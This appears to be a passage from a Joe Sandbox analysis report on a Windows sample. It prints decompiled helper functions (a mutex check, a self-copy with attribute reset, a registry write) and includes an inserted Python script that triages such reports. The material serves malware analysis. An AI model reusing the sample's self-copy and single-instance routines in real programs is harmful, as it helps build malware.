                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CursorLoad
                                                    • String ID:
                                                    • API String ID: 3238433803-0
                                                    • Opcode ID: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                    • Instruction ID: e70e3c34bb26c70f92347ae4735de209fc646f551b3d90022d55a82ec6438589
                                                    • Opcode Fuzzy Hash: bf689adfd6e98978778aa1b4e9e96d131d583808497e92ae72d4c8abb297034b
                                                    • Instruction Fuzzy Hash: EFF08261B04204579A20563E5CC1A7E7288DBD6B36B60033FFD39E77D2CF2E6C46425A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00409A90(void* __eax, long __edx) {
                                                    				int _t4;
                                                    				long _t7;
                                                    
                                                    				_t7 = 0;
                                                    				_t4 = SetFileAttributesA(E00404E80(__eax), __edx); // executed
                                                    				if(_t4 == 0) {
                                                    					_t7 = GetLastError();
                                                    				}
                                                    				return _t7;
			}

Addresses: 0x00409a97 0x00409aa2 0x00409aa9 0x00409ab0 0x00409ab0 0x00409ab7

                                                    APIs
                                                    • SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                    • GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 1799206407-0
                                                    • Opcode ID: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                    • Instruction ID: a8da59a57bdf58849924320cc2d236a07249c13e055f30f78d96cafe0e5643bb
                                                    • Opcode Fuzzy Hash: 0e6a4d1ed7d989c59ffe3b7b72477e84c03d875daab59c38629556e62ceda4c0
                                                    • Instruction Fuzzy Hash: ABD0C9627051202A961065FF2C8195B818D8ED55A9301427FBA08E3292E568DC0A01BA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 60%
                                                    			E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
                                                    				char _v8;
                                                    				char _v9;
                                                    				void* _t13;
                                                    				intOrPtr _t25;
                                                    				void* _t27;
                                                    				void* _t30;
                                                    
                                                    				_v9 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				_push(_t30);
                                                    				_push(0x4742ac);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t30 + 0xfffffff8;
                                                    				_t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
                                                    				_t27 = _t13;
                                                    				if(GetLastError() != 0xb7) {
                                                    					if(_t27 != 0 && _v9 == 0) {
                                                    						CloseHandle(_t27);
                                                    					}
                                                    				}
                                                    				_pop(_t25);
                                                    				 *[fs:eax] = _t25;
                                                    				_push(0x4742b3);
                                                    				return E004049C0( &_v8);
			}

Addresses: 0x00474244 0x00474247 0x0047424d 0x00474254 0x00474255 0x0047425a 0x0047425d 0x0047426f 0x00474274 0x00474280 0x00474288 0x00474291 0x00474291 0x00474288 0x00474298 0x0047429b 0x0047429e 0x004742ab

                                                    APIs
                                                      • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    • GetLastError.KERNEL32(00000000,004742AC), ref: 00474276
                                                    • CloseHandle.KERNEL32(00000000,00000000,004742AC), ref: 00474291
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateErrorHandleLastMutex
                                                    • String ID:
                                                    • API String ID: 4294037311-0
                                                    • Opcode ID: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                    • Instruction ID: 318a60ea147540a6397c20476c41d700bab3d71984a2db83ba3ffa28fcbaf965
                                                    • Opcode Fuzzy Hash: 853c572458218ba62eaacf0c9af16c73941a2d40b62ad29ed1ccb0490e373708
                                                    • Instruction Fuzzy Hash: 3BF0F970908204AEDB11EAE59903AAF77DC9B95364F1242BBF808B22D2DB7C5D10819E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				intOrPtr _t51;
                                                    				void* _t56;
                                                    				void* _t59;
                                                    				void* _t61;
                                                    
                                                    				_t61 = __eflags;
                                                    				_v20 = 0;
                                                    				_v16 = 0;
                                                    				_t56 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v8);
                                                    				E00404E70(_v12);
                                                    				_push(_t59);
                                                    				_push(0x4738af);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t59 + 0xfffffff0;
                                                    				if(E00409A48(_v12, _t61) != 0) {
                                                    					E00404BB8( &_v16, E00404E80(_v12));
                                                    					E00409A90(_v16, 0x80);
                                                    				}
                                                    				_t44 = E00404E80(_v12);
                                                    				CopyFileA(E00404E80(_v8), _t25, 0); // executed
                                                    				E00404BB8( &_v20, _t44);
                                                    				E00409A90(_v20, _t56);
                                                    				_pop(_t51);
                                                    				 *[fs:eax] = _t51;
                                                    				_push(0x4738b6);
                                                    				return E004049E4( &_v20, 4);
			}

Addresses: 0x00473804 0x0047380e 0x00473811 0x00473814 0x00473816 0x00473819 0x0047381f 0x00473827 0x0047382e 0x0047382f 0x00473834 0x00473837 0x00473844 0x00473853 0x00473860 0x00473860 0x0047386f 0x0047387b 0x00473885 0x0047388f 0x00473896 0x00473899 0x0047389c 0x004738ae

                                                    APIs
                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0047387B
                                                      • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                      • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$AttributesCopyErrorLast
                                                    • String ID:
                                                    • API String ID: 2414470624-0
                                                    • Opcode ID: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                    • Instruction ID: 249739c2ab59324f255857505799179cd9e45a8e1fd9df759088737bab44b84f
                                                    • Opcode Fuzzy Hash: 54442e2231ed2fe87a44932f825a708ca2f892266ddc8fd19e2cb738c30a7185
                                                    • Instruction Fuzzy Hash: 9C1116B0E001099BDB00EFAAD88299EB7F9FF44714F51457BF514B3391DB389E058A98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
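
The E0047423C block (CreateMutexA through E00406F90, then GetLastError compared with 0xb7, which is ERROR_ALREADY_EXISTS), the E00473804 block (SetFileAttributesA to 0x80, FILE_ATTRIBUTE_NORMAL, on an existing destination so that read-only or hidden bits cannot block the overwrite, CopyFileA with bFailIfExists = 0, then the caller-supplied attributes from __ecx applied to the copy) and the OpenSCManagerA tail above (0xf003f is SC_MANAGER_ALL_ACCESS, which a non-administrative caller is denied) are the functions a reviewer wants to find quickly in a report this long. The following Python script is an added example, not code from the report, from Joe Sandbox or from the sample: it parses the 'C-Code' blocks of a report saved as text, gathers the API calls listed under each function (including 'Part of subcall' entries) and flags those three patterns. The pattern labels, the FunctionRecord layout and SAMPLE_REPORT, which is constructed from abridged lines of this page, are this example's own assumptions.

```python
"""Triage helper for the decompiled-function blocks of a Joe Sandbox report.

Added example; not code from the report or from the sample. It parses the
'C-Code' blocks of a report saved as text, collects the Win32 calls listed
under each function's 'APIs' entry ('Part of subcall' lines included) and
flags the call patterns visible on this page. Labels, record layout and
SAMPLE_REPORT (constructed from lines of this page) are assumptions.
"""
import re
from dataclasses import dataclass, field

# A block starts with 'C-Code - Quality: NN%'; its signature line looks like
# 'E00409A90(void* __eax, long __edx) {' (call statements end in ';' instead).
SIG_RE = re.compile(r"^\s*([EL][0-9A-F]{8})\(.*\)\s*\{\s*$")
# APIs entries: '• Name.MODULE(args), ref: ADDR' or
# '  • Part of subcall function ADDR: Name.MODULE(args), ref: ADDR'.
API_RE = re.compile(r"^\s*•\s*(Part of subcall function [0-9A-F]{8}:\s*)?"
                    r"(\w+)\.(\w+).*?ref:\s*([0-9A-F]{8})")

PATTERNS = [  # (label, APIs that must all be reached, constant in the C-code)
    ("privilege probe: OpenSCManagerA with SC_MANAGER_ALL_ACCESS (0xF003F)",
     {"OpenSCManagerA"}, r"\b0xf003f\b"),
    ("single-instance check: CreateMutexA, GetLastError == ERROR_ALREADY_EXISTS (0xB7)",
     {"CreateMutexA", "GetLastError"}, r"\b0xb7\b"),
    ("self-copy with attributes reset: SetFileAttributesA(FILE_ATTRIBUTE_NORMAL) and CopyFileA",
     {"CopyFileA", "SetFileAttributesA"}, r"\b0x80\b"),
]


@dataclass
class FunctionRecord:
    name: str
    apis: set = field(default_factory=set)      # calls made directly
    subcalls: set = field(default_factory=set)  # calls made through callees
    refs: dict = field(default_factory=dict)    # API name -> call-site address
    text: list = field(default_factory=list)    # raw lines of the block
    findings: list = field(default_factory=list)


def parse_functions(report_text):
    """Split report text into one FunctionRecord per decompiled block."""
    records = [FunctionRecord("<leading fragment>")]  # text before first header
    for line in report_text.splitlines():
        if line.strip().startswith("C-Code - Quality"):
            records.append(FunctionRecord("<unnamed>"))
            continue
        rec = records[-1]
        rec.text.append(line)
        sig = SIG_RE.match(line)
        if sig and rec.name == "<unnamed>":
            rec.name = sig.group(1)
            continue
        api = API_RE.match(line)
        if api:
            (rec.subcalls if api.group(1) else rec.apis).add(api.group(2))
            rec.refs[api.group(2)] = api.group(4)
    return [r for r in records if r.text]


def triage(report_text):
    """Return the records, each annotated with the patterns it matches."""
    records = parse_functions(report_text)
    for rec in records:
        reached = rec.apis | rec.subcalls
        body = "\n".join(rec.text)
        for label, needed, const_re in PATTERNS:
            if needed <= reached and re.search(const_re, body, re.IGNORECASE):
                rec.findings.append(label)
    return records


# Constructed from the decompiled blocks on this page, abridged to the lines
# the parser needs; a real run takes the whole report saved as text.
SAMPLE_REPORT = """\
    _t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922), ref: 004738F8
• CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922), ref: 00473907
C-Code - Quality: 100%
    E00409A90(void* __eax, long __edx) {
APIs
• SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
• GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
C-Code - Quality: 60%
    E0047423C(char __eax, void* __ebx, char __edx, void* __esi, void* __eflags) {
    _t13 = E00406F90(0, 0xffffffff, E00404E80(_v8)); // executed
    if(GetLastError() != 0xb7) {
APIs
  • Part of subcall function 00406F90: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
• GetLastError.KERNEL32(00000000,004742AC), ref: 00474276
• CloseHandle.KERNEL32(00000000,00000000,004742AC), ref: 00474291
C-Code - Quality: 72%
    E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
    E00409A90(_v16, 0x80);
    CopyFileA(E00404E80(_v8), _t25, 0); // executed
APIs
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0047387B
  • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
"""

if __name__ == "__main__":
    for rec in triage(SAMPLE_REPORT):
        print(rec.name, sorted(rec.apis | rec.subcalls), rec.findings)
```

Run it over the whole report saved as text rather than the abridged sample; records whose findings list stays empty (the cursor, resource and window-text helpers on this page) can be skipped on a first pass, and the `refs` addresses point straight at the call sites to confirm in the dump.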

                                                    C-Code - Quality: 65%
                                                    			E0041A81C(void* __eax, struct HINSTANCE__* __edx) {
                                                    				intOrPtr _v8;
                                                    				void* __ebx;
                                                    				void* __ecx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				signed int _t10;
                                                    				intOrPtr _t15;
                                                    				struct HINSTANCE__* _t20;
                                                    				intOrPtr* _t22;
                                                    				intOrPtr _t30;
                                                    				void* _t32;
                                                    				intOrPtr* _t35;
                                                    				intOrPtr _t38;
                                                    				intOrPtr _t40;
                                                    
                                                    				_t38 = _t40;
                                                    				_push(_t22);
                                                    				_t35 = _t22;
                                                    				_t20 = __edx;
                                                    				_t32 = __eax;
                                                    				if(__edx == 0) {
                                                    					_t20 =  *0x49e668; // 0x400000
                                                    				}
                                                    				_t10 = FindResourceA(_t20, E00404E80(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
                                                    				_t43 = _t10;
                                                    				if(_t10 == 0) {
                                                    					return _t10;
                                                    				} else {
                                                    					_v8 = E0041E0D0(_t20, 1, 0xa, _t32);
                                                    					_push(_t38);
                                                    					_push(0x41a890);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t40;
                                                    					_t15 = E0041DA30(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
                                                    					 *_t35 = _t15;
                                                    					_pop(_t30);
                                                    					 *[fs:eax] = _t30;
                                                    					_push(E0041A897);
                                                    					return L00403BEC(_v8);
                                                    				}
			}

Addresses: 0x0041a81d 0x0041a81f 0x0041a823 0x0041a825 0x0041a827 0x0041a82b 0x0041a82d 0x0041a82d 0x0041a845 0x0041a848 0x0041a84a 0x0041a89e 0x0041a84c 0x0041a85d 0x0041a862 0x0041a863 0x0041a868 0x0041a86b 0x0041a873 0x0041a878 0x0041a87c 0x0041a87f 0x0041a882 0x0041a88f 0x0041a88f

                                                    APIs
                                                    • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0041A83E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindResource
                                                    • String ID:
                                                    • API String ID: 1635176832-0
                                                    • Opcode ID: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                    • Instruction ID: 3fa3efa78a76847535e85a5113efc15ba7d11e1912711d246983766bb9fbce65
                                                    • Opcode Fuzzy Hash: 1f0f77f61c370d43777ca3830916bf5545215fc97a5c03c6e6324103791e270a
                                                    • Instruction Fuzzy Hash: 1E014771304300ABE301EF6AEC42EAAB7ADEB88728711407EF504C7381DA79AC028258
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E0045A28C(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                                    				char _v8;
                                                    				void* _t27;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t40;
                                                    				char _t41;
                                                    
                                                    				_push(0);
                                                    				_t37 = __edx;
                                                    				_t27 = __eax;
                                                    				_push(_t40);
                                                    				_push(0x45a30e);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t40;
                                                    				_t41 =  *((char*)(__eax + 0xa4));
                                                    				if(_t41 == 0) {
                                                    					_t7 = _t27 + 0x8c; // 0x8c
                                                    					E00404A14(_t7, __edx);
                                                    				} else {
                                                    					E0045A240(__eax,  &_v8);
                                                    					E00404DCC(_v8, _t37);
                                                    					if(_t41 != 0 ||  *((intOrPtr*)(_t27 + 0x8c)) != 0) {
                                                    						SetWindowTextA( *(_t27 + 0x30), E00404E80(_t37));
                                                    						_t6 = _t27 + 0x8c; // 0x8c
                                                    						E004049C0(_t6);
                                                    					}
                                                    				}
                                                    				_pop(_t33);
                                                    				 *[fs:eax] = _t33;
                                                    				_push(E0045A315);
                                                    				return E004049C0( &_v8);
			}

Addresses: 0x0045a28f 0x0045a293 0x0045a295 0x0045a299 0x0045a29a 0x0045a29f 0x0045a2a2 0x0045a2a5 0x0045a2ac 0x0045a2eb 0x0045a2f3 0x0045a2ae 0x0045a2b3 0x0045a2bd 0x0045a2c2 0x0045a2d9 0x0045a2de 0x0045a2e4 0x0045a2e4 0x0045a2c2 0x0045a2fa 0x0045a2fd 0x0045a300 0x0045a30d

                                                    APIs
                                                      • Part of subcall function 0045A240: GetWindowTextA.USER32 ref: 0045A263
                                                    • SetWindowTextA.USER32(?,00000000), ref: 0045A2D9
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: TextWindow
                                                    • String ID:
                                                    • API String ID: 530164218-0
                                                    • Opcode ID: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                    • Instruction ID: 29e0112d14c0054e859a686d8a752fc0bc116d16f21071392ac3c9ea7363cd22
                                                    • Opcode Fuzzy Hash: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                    • Instruction Fuzzy Hash: E001D4B06006049BD701EB65C842B5A72A8AB88704F5042B7FD0497383D63C9D59866E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00407A8C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                    				CHAR* _v8;
                                                    				void* _t13;
                                                    				struct HWND__* _t24;
                                                    				CHAR* _t29;
                                                    				long _t32;
                                                    
                                                    				_v8 = _t29;
                                                    				_t32 = __eax;
                                                    				_t13 = E00402C0C();
                                                    				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                    				E00402BFC(_t13);
                                                    				return _t24;
                                                    			}
                                                     Address column: 0x00407a93 0x00407a98 0x00407a9a 0x00407acb 0x00407ad4 0x00407ae0

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                    • Instruction ID: 8ac853332085b9bd21b4b606e16f655482de0c328e5100a7f3fe009a2cef9f92
                                                    • Opcode Fuzzy Hash: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                    • Instruction Fuzzy Hash: EDF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                    				long _v8;
                                                    				void* _t12;
                                                    				struct HWND__* _t22;
                                                    				long _t27;
                                                    				CHAR* _t30;
                                                    
                                                    				_v8 = _t27;
                                                    				_t30 = __eax;
                                                    				_t12 = E00402C0C();
                                                    				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                    				E00402BFC(_t12);
                                                    				return _t22;
                                                    			}
                                                     Address column: 0x00407aeb 0x00407af0 0x00407af2 0x00407b21 0x00407b2a 0x00407b36

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                    • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                    • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                    • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00432310(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
                                                    				char* _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				int _t11;
                                                    				long _t17;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    				intOrPtr _t23;
                                                    				char _t26;
                                                    
                                                    				_v8 = __ecx;
                                                    				_t26 = __edx;
                                                    				_t21 = __eax;
                                                    				_t11 = L00431D9C(_a4);
                                                    				_t27 = _t11;
                                                    				_t17 = RegSetValueExA( *(_t21 + 4), E00404E80(__edx), 0, _t11, _v8, _a8); // executed
                                                    				if(_t17 != 0) {
                                                    					_v16 = _t26;
                                                    					_v12 = 0xb;
                                                    					_t23 =  *0x49daf4; // 0x417504
                                                    					_t20 = E0040D23C(_t21, _t23, 1, _t26, _t27, 0,  &_v16);
                                                    					E00404378();
                                                    					return _t20;
                                                    				}
                                                    				return _t17;
                                                    			}
                                                     Address column: 0x00432319 0x0043231c 0x0043231e 0x00432323 0x00432328 0x00432341 0x00432348 0x0043234a 0x0043234d 0x00432357 0x00432364 0x00432369 0x00000000 0x00432369 0x00432374

                                                    APIs
                                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00432341
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                    • Instruction ID: 39d1438e57032ee4bbe9f28f00567530b1aebd0f65b6a02640603f55bb4cbe43
                                                    • Opcode Fuzzy Hash: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                    • Instruction Fuzzy Hash: 47F0A471A001087BD700EBAEDC81EAFB7EC9B49314F0040BAFA18E7391DA749D0087A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(00000000,0040460A,?,0049E048,0049B000,0049E638,?,004048AA,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004045FA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 2cb3a6cdacff41b7ecbae53b36e203073edb292a1c78f0b9e480f1db04bccd11
                                                    • Instruction ID: f7c3943724ba43c609a58c6de3d79b89b9e31c002ee06463d4949cc27b2d666d
                                                    • Opcode Fuzzy Hash: 2cb3a6cdacff41b7ecbae53b36e203073edb292a1c78f0b9e480f1db04bccd11
                                                    • Instruction Fuzzy Hash: 0BF05B713056056FA3114E47D991913F79CFBD57603558877DA08D3690D639E8118568
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 53%
                                                    			E0043EAF8(intOrPtr __eax) {
                                                    				intOrPtr _v8;
                                                    				void* __ecx;
                                                    				int _t15;
                                                    				intOrPtr _t17;
                                                    				void* _t19;
                                                    				void* _t20;
                                                    				intOrPtr _t23;
                                                    				void* _t24;
                                                    				void* _t25;
                                                    				intOrPtr _t28;
                                                    
                                                    				_push(_t20);
                                                    				_v8 = __eax;
                                                    				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000200;
                                                    				_push(_t28);
                                                    				_push(0x43eb45);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t28;
                                                    				_t15 = DestroyWindow( *(_v8 + 0x180)); // executed
                                                    				if(_t15 == 0) {
                                                    					E0040E79C(_t19, _t20, _t24, _t25);
                                                    				}
                                                    				_pop(_t23);
                                                    				 *[fs:eax] = _t23;
                                                    				_push(0x43eb4c);
                                                    				_t17 = _v8;
                                                    				 *(_t17 + 0x54) =  *(_t17 + 0x54) & 0x0000fdff;
                                                    				return _t17;
                                                    			}
                                                     Address column: 0x0043eafb 0x0043eafc 0x0043eb02 0x0043eb0a 0x0043eb0b 0x0043eb10 0x0043eb13 0x0043eb20 0x0043eb27 0x0043eb29 0x0043eb29 0x0043eb30 0x0043eb33 0x0043eb36 0x0043eb3b 0x0043eb3e 0x0043eb44

                                                    APIs
                                                    • DestroyWindow.USER32(?,00000000,0043EB45), ref: 0043EB20
                                                      • Part of subcall function 0040E79C: GetLastError.KERNEL32(00000000,0040E82C), ref: 0040E7B6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DestroyErrorLastWindow
                                                    • String ID:
                                                    • API String ID: 1182162058-0
                                                    • Opcode ID: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                    • Instruction ID: c963e65f66f93bc950c3b922f0db45755e41eff8f234a4ebd21f449329ecdab1
                                                    • Opcode Fuzzy Hash: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                    • Instruction Fuzzy Hash: 4EF03031615704EFEB16CB6ACA56D59F7E8EB0C710B6204BAF900D7691E638BD10DA18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00425A84(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
                                                    				int _t9;
                                                    				int _t13;
                                                    				void* _t14;
                                                    				intOrPtr _t17;
                                                    
                                                    				_t14 = __eax;
                                                    				_t17 =  *0x425ac4; // 0x3
                                                    				E00425D3C(__eax, __ecx, _t17);
                                                    				 *__ecx = 0;
                                                    				__ecx->cy = 0;
                                                    				_t9 = E00404C80(__edx);
                                                    				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00404E80(__edx), _t9, __ecx); // executed
                                                    				return _t13;
                                                    			}
                                                     Address column: 0x00425a8b 0x00425a8d 0x00425a95 0x00425a9c 0x00425aa0 0x00425aa6 0x00425ab8 0x00425ac0

                                                    APIs
                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 00425AB8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExtentPoint32Text
                                                    • String ID:
                                                    • API String ID: 223599850-0
                                                    • Opcode ID: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                    • Instruction ID: 930b99cdb260b2b8a229d6862ebc98a20fe47073bc0098dbe1fe4fd8dd38ffb9
                                                    • Opcode Fuzzy Hash: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                    • Instruction Fuzzy Hash: 4AE08CB23112102B9350EB7E6C81A6BAAED8FCC225309897FF98CD3342D538DC058368
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

